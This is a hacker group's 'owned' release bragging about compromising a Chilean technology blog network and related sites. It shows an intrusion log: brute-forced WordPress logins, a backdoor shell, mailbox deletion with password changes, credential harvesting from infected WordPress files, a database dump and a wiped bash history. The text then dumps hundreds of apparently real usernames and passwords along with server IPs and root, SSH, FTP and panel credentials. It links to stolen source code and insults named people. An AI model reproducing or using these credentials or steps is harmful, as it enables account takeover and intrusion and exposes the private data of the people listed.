|||||||||||||||||||||||||||||||||||||||||||||||||||||
[================== 1ns3c gr0up ====================]
[------- t1nky_w1nky - d1psy - l44_l44 - p0 -------]
___________ .___.____ __
\_ _____/ _ \ | | | ________ _____/ |______
| __)/ /_\ \| | | \___ // __ \ __\__ \
| \/ | \ | |___ / /\ ___/| | / __ \_
\___ /\____|__ /___|_______ \/_____ \\___ >__| (____ /
\/ \/ \/ \/ \/ \/[======================| 0wn3d |=====================]
||||||||||||||||||||||||||||||||||||||||||||||||||||||/*
* BetaFail (aka BetaZeta aka LoserZeta aka BetaWeeta — thnx chilean dudes ^^)
* is a loser-blogger-network which claims to be experts on technology… so lets see!
*/]====== 0×00 ======[ Index
[=-0x01-=] Affected domains
[=-0x02-=] Vulnerabilities
[=-0x03-=] Intrussion
[=-0x04-=] Data requesting
[=-0x05-=] Exposure
[=-0x06-=] Extras——————————————————————————-
]====== 0×01 =======[ Affected Domains
+ The affected domains are:
|- http://www.betazeta.com
|- http://www.fayerwayer.com
|- http://www.theclinic.cl
|- http://www.saborizante.cl
|- http://leo.prieto.cl
|- http://www.betaid.org
|- http://www.wayerless.com
|- http://www.niubie.com
|- http://www.botonturbo.com
|- http://www.tecnosquad.com
|- http://www.chw.net
|- http://www.zetacorp.net
|- http://www.zimio.com
|- http://www.i2b.cl
|_/
-
-------------------------------------------------------------------------------
]====== 0×02 ======[ Vulnerabilities
/*
* So you can ask yourself, how can this be? Easy: if you set a weak
* password you have a weak security, if you store all your accounts in your mail
* you hace a weak security.
* -> JF aka JF10 aka Juan Francisco Diez has a 9 int long password, easy enought to
* been brute forced.
* -> Leo aka Leo Prieto has a 5 char + 3 int password (dictionary password).
* And so on... these dudes really don't know shit about security and lucky for us
* theirs servers were totally open for us (open legs?).
*/-------------------------------------------------------------------------------
]====== 0×03 ======[ Intrussion
/* Hey ho, lets GO! */(=| proof-of-concept |=)
/* First get get the silliest password ever from our very best friend JF on any of
* the services he uses: twitter, wordpress, etc.. (yes... really silly but he uses
* the same password for everything!):
*/[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=jf10 http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
……………………………………………………………………..
……………………………………………………………………..
………………….. FOUND! (2020229)
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=’leo prieto’ http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
……………………………………………………………………..
……………………………………………………………………..
……………………………………………………………………..
………………………………………….. FOUND! (macoy123)
[1nf3ct3d@darkside:~]$/* Done. Now, search a prompt: */
[1nf3ct3d@darkside:~]$ telnet fayerwayer.com 37337
Trying 174.132.120.218…
Connected to fayerwayer.com.
Escape character is ‘^]’.
bash$/* Now we can try with anything… say… gmail: */
[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user jf10 -pass 2020229 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password … OK
New password is: HuJucF53/* Heh! Now lets play with Leo Prieto’s stuff (again… same password almost
* for everything) */[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user leo -pass macoy123 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password … OK
New password is: 4Gh4Fhb
[1nf3ct3d@darkside:~]$——————————————————————————-
]====== 0×04 ======[ Data requesting
/* Wordpress has been infected ... now waiting for our data */[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/12/sheet.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ tail sheet.jpg
user: pass:
user: pass:
user: mr_self-destruct pass: 13587527
user: march3lo pass: marcel
user: mr_self-destruct pass: 88007239
user: mr_self-destruct pass: 88007239
user: sir_lestat pass: martin
user: asdsadfsadf pass: lalalalalala
user: Chok pass: minako
user: successor pass: BWN72HL0
/* Amazing …. */
[1nf3ct3d@darkside:~]$ wc -l sheet.jpg
682 sheet.jpg
[1nf3ct3d@darkside:~]$ wget http://www.botonturbo.com/wp-content/uploads/2007/11/sheet.jpg -o /dev/null -O sheet2.jpg
[1nf3ct3d@darkside:~]$/* Awesome! For each domain we repeat */
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org
Password:
betaid@betaid.org:~$ ls
app_error.php app_model.php config controllers htaccess.template httpdocs index.php locale models plugins tests tmp vendors views webroot
betaid@betaid.org:~$ cd config
betaid@betaid.org:~/config$ ls
acl.ini.php betaid.php bootstrap.php chile.sql core.php database.php entelpcs.php inflections.php openid.php routes.php sql
betaid@betaid.org:~$ grep -v \* database.php
class DATABASE_CONFIG {var $default = array(
‘driver’ => ‘mysql’,
‘persistent’ => false,
‘host’ => ‘localhost’,
‘login’ => ‘betaman’, /* look at this! */
‘password’ => ‘betapass’,
‘database’ => ‘betaid_main’,
‘encoding’=> ‘UTF8′,
‘prefix’ => ”,
);var $test = array(
‘driver’ => ‘mysql’,
‘persistent’ => false,
‘host’ => ‘localhost’,
‘login’ => ‘user’,
‘password’ => ‘password’,
‘database’ => ‘test_database_name’,
‘prefix’ => ”,
);
}
betaid@betaid.org:~$
/* OMFG! Is a DB_delete_all_my_content password? */betaid@betaid.org:~$ mysqldump -ubetaman -pbetapass betaid_main >../httpdocs/betaz.sql
betaid@betaid.org:~$ exit
[1nf3ct3d@darkside:~]$ wget http://www.betaid.org/betaz.sql -o /dev/null
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org “rm -rf httpdocs/betaz.sql && shred .bash_history”
Password:
[1nf3ct3d@darkside:~]$/* Its time to infect betaid to obtain all data!. We modify controller/auth_controller.php and pump it up */
[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ wc -l audi-a3.jpg
262 audi-a3.jpg
[1nf3ct3d@darkside:~]$ tail -5 audi-a3.jpg
user: zector pass: celular
user: chokolat pass: dagchuman
user: andru pass: nenyaa
user: angrod pass: angrod01
user: elmono pass: 15369775
[1nf3ct3d@darkside:~]$ perl http-delete.pl http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -u admin
admin’s pwd:
1 file(s) deleted.
[1nf3ct3d@darkside:~]$——————————————————————————-
]====== 0×05 ======[ Exposure
/* All that you want to see! THE DATA! */
/* Anyone want to twit? */
twitter.com:fayerwayer:f4y3rw4y3rdoesthisshit4realz
vimeo.com:fw@fayerwayer.com:gatoinalambricoZeroZen:
mail.google.com/a/zetacorp.net:zerozen:rtr944a5
gmail.com:zeroblogger:rtr944a5
www.google.com/a/betazeta.com:zerozen:rtr944a4Mail:Pass
jf@betazeta.com:2020229
leo@betazeta.com:macoy123http://wayerless.com
user:sebastian pass: elantro2008
user:rodrigo pass: rcaceres29
user:juaqion pass: kilometro
user: rodrigo pass: rcaceres29
user: admin pass: gatosinalambricos
user: frajola pass: 375hb5FayerWayer:
user: rodrigo pass: rcaceres29
user: admin pass:gatosinalambricos
user: frajola pass:375hb5
user: JF10 pass:2020229
user: sebastian pass:elantro2008
user: carlos pass:betagato88
user: Amenadiel pass:parafern
user: hugo pass:gatos
user: admin pass:DFeu78x8
user: i2b pass:gatoadministrador
user: diego pass:77N569
user: leo prieto pass:macoy123
user: diego pass:77N569
user: Diego pass:77N569
user: diego pass:77N569
user: ZeroZen pass:rtr944a5
user: carlos pass:120977xs
user: Ultraviolet pass:qazxcde
user: FelipeLang pass:5253J3
user: Ultraviolet pass:nosoygay1985
user: eft0 pass:estebangato
user: eft0@zetacorp pass:rocka.oneDB user fayerwayer
DB pass MysqlFayerwayer80user: mr.chips pass:jurassic1410
user: mr. chips pass:jurassic1410
user: mr. chips pass:aschek
user: mr. chips pass:aschek61124
user: mr. chips pass:jurassic
user: mr. chips pass:1410
user: mr. chips pass:jurassic1410
user: mr.chips pass:jurassic
user: mr.chips pass:jurassic1410
user: mr.chips pass:aschek61124
user: mr.chips pass:jurassic
user: mr.chips pass:61124
user: mr. chips pass:aschek
user: mr. chips pass:aschek61124
user: mr. chips pass:jurassic
user: mr. chips pass:jurassic1410
user: mr. chips pass:1410
user: mr. chips pass:61124
user: Boxbyte pass:4ping2pong
user: admin pass:DFeu78x8
user: leoprieto@gmail.com pass: macoy123URL: http://69.89.21.73:2082/frontend/bluehost/index.html
user: itwobcl
pass: 1ee2dos2veh1FTP
IP: 69.89.21.73
User: itwobcl
Pass: 1ee2dos2veh1
---
Jabber
User: esteban@hs.i2b.cl
Pass: efernandez47
SMTP: smtp.i2b.cl
Port: 587
POP: pop.i2b.cl
Port: 110
User and account: esteban.fernandez@i2b.cl
Pass: efernandez47
---
Customer #: 18766006
Simple Control Panel
URL: https://72.167.52.30:9999
User: zetacorp
Pass: DFeu78x8phpmyadmin
URL: http://72.167.52.30/phpMyAdmin
User: root
Pass: DFeu78x8SSH
IP: 72.167.52.30
User: zetacorp
Pass: DFeu78x8Admin WP
http://www.fayerwayer.com/wp-adminUser: admin
Pass: DFeu78x8Admin Limesurvey
http://www.fayerwayer.com/limesurvey/admin
User: admin
Pass: DFeu78x8MySQL
User: root
Pass: DFeu78x8Backup
IP: 208.109.188.17
User: zetacorp
Pass: DFeu78x8PIX
https://72.167.52.79/
User: zetacorp
Pass: DFeu78x8ftp FW
Host: fayerwayer.i2b.cl
User: fayerwayer
Pass: X6597Z4Ei2b
URL: www.bluehost.com
User: i2b.cl
Pass: 1ee2dos2veh1FTP ablog.i2b.cl
Host: 69.89.21.73
User: itwobcl
Pass: 1ee2dos2veh1
Root Blog: /public_html/blog/http://www.betazeta.com/wp-admin/
User: admin
Pass: betazeta2k8zimio.com (SCP)
User: zimio
Pass: 57MQ3LYPbetazeta.com
FTP
User: betazeta
Pass: 89428V5Vwayerless.com
FTP
User: wayerless
Pass: VGJT5983zetacorp.net
FTP
User: zetacorp
Pass: G7UCCLW9Plesk
URL: https://64.13.250.71:8443
Username:admin
Password:aAmigosSSH
Host: saborizante.com
User: efernadez
Pass: efernandez47Root
Pass: markymark2001Sites
Path: /var/www/vhosts/dominioUser name: eft0
Password : betazeta
http://betazetanet.seework.comhttp://devwayerles.i2b.cl
Username: admin
Password: mf*8kRE5PyFpBetaID
user: lpinto pass: qwerty
user: perovi pass: paularos
user: nestorcarrasco pass: nintendo
user: volkova pass: yulia
user: melkorazo pass: MlkrZ123be
user: melkorazo pass: MlkrZ123be
user: patofuqs pass: olomongolo15
user: patofuqs pass: villarevans22
user: patofuqs pass: olomongolo15
user: patofuqs pass: villarevans22
user: gagoner pass: olzue2iq
user: claudiomix pass: clamiranda
user: Vidal pass: betacueva
user: vidal pass: betacueva
user: lorena pass: k4m3l30n
user: Polin pass: 4815162342
user: derangedwolf pass: ronsilver
user: darkoy pass: maniac
user: darkjano pass: 29111979
user: hetnet pass: 486Es30
user: hetnet pass: 486Es30
user: nivyii pass: darkmaskmas
user: nivyii pass: darkmas
user: serroba pass: sm293arias
user: don juan pass: 300309144
user: donjuan pass: 300309144
user: grouchomarx pass: catolica
user: grouchomarx pass: cato
user: Evadix pass: casera
user: doruku pass: welltall01
user: neuroshark pass: cassiopeia
user: neuroshark pass: cassiopeia
user: andyolivares pass: tgs6ae8103
user: andyolivares pass: tgs6ae8103
user: firexcool pass: belmont5
user: noquierouser pass: msn728843
user: Ecodrive pass: QAZ.8680
user: ecodrive pass: QAZ.8680
user: masteralfe pass: 300km/h
user: Juako pass: kirk.8130
user: talkover pass: navidad7
user: davidqs pass: 2201
user: Thefx pass: frasco1
user: thefx pass: frasco1
user: sprite pass: 98485238
user: nachx00 pass: YufFmNow
user: nachx00 pass: shithappens
user: pass: shitit
user: vagrant pass: p4nch0
user: forbidden pass: fuckyou0
user: payazo pass: panchobeta
user: mescalier pass: retinalcircus
user: ruffox pass: mikehamuert0
user: khalebd pass: mibebe
user: fako85 pass: 4725781
user: patus pass: ernesto
user: jorge pass: aktive123
user: dsalgado pass: paranoid
user: joseph pass: amariloo
user: joseph pass: amarillo
user: manuel pass: man16812
user: suikakuyu pass: voyaserpro
user: suikakuyu pass: voyaserpro
user: eduardo pass: Strategyc
user: paz pass: humbert
user: paz pass: humbert
user: dickinsonh2k pass: 374357787
user: clarkxp pass: ccom2k1
user: laura pass: carolita
user: Marmota pass: marmota1988
user: zirex pass: ignacio16
user: chinito46 pass: 82002523
user: lukas pass: jibarizado
user: lukas pass: salpimentar
user: Esperpento pass: jibarizado
user: rvs pass: thervsbrothers
user: davdor pass: thebeatles00
user: kmepartaunrayo pass: computadora
user: hiroki pass: warq69
user: jf10 pass: 1234
user: ail pass: Zektorj4j4
user: JanoMac pass: 998917850
user: eldarberserker pass: v4lh4ll4
user: Nanolethal pass: nosferatu
user: necrox pass: 1nacho
user: rkstro pass: 656565rod
user: Elias pass: amanda1806
user: antony pass: 12345abcde+
user: turbomaster pass: miguel
user: turbomaster pass: miguel
user: turbomaster pass: asdqwe
user: Foxtrot pass: cygnus2112
user: vortex pass: g0dz1ll4
user: vortex pass: g0dz1ll4
user: francofa pass: hardcore1
user: saint pass: c0rps41nt
user: wurrzag pass: bici6luz
user: wurrzag pass: mN4awyc9
user: wurrzag pass: uz1d8kbe
user: wurrzag pass: pera6luz
user: infositio pass: piporrin
user: camilo_dxmg@live pass: celular
user: zector pass: celular
user: chokolat pass: dagchuman
user: andru pass: nenyaa
user: angrod pass: angrod01
user: elmono pass: 15369775-------------------------------------------------------------------------------
]====== 0×06 ======[ Extras
/* Do you remember when CHW was erradicated?
* Oh wait. Remember bootlog too?
* — That’s was the OPPORTUNITY which BetaZeta has to set a REAL security-policy
*
* Wanna download the betaid source code? Here:
*
* http://rapidshare.com/files/254417420/betaid.org.zip.html
* http://www.megaupload.com/?d=8FT5KYTP
*
*
* Direct message to JF: Be more humble, piece of shit.
* Seeya in the next issue!
*//* Dud3s! Y0u’ve been pwn3d by teletubbies! */
EOF
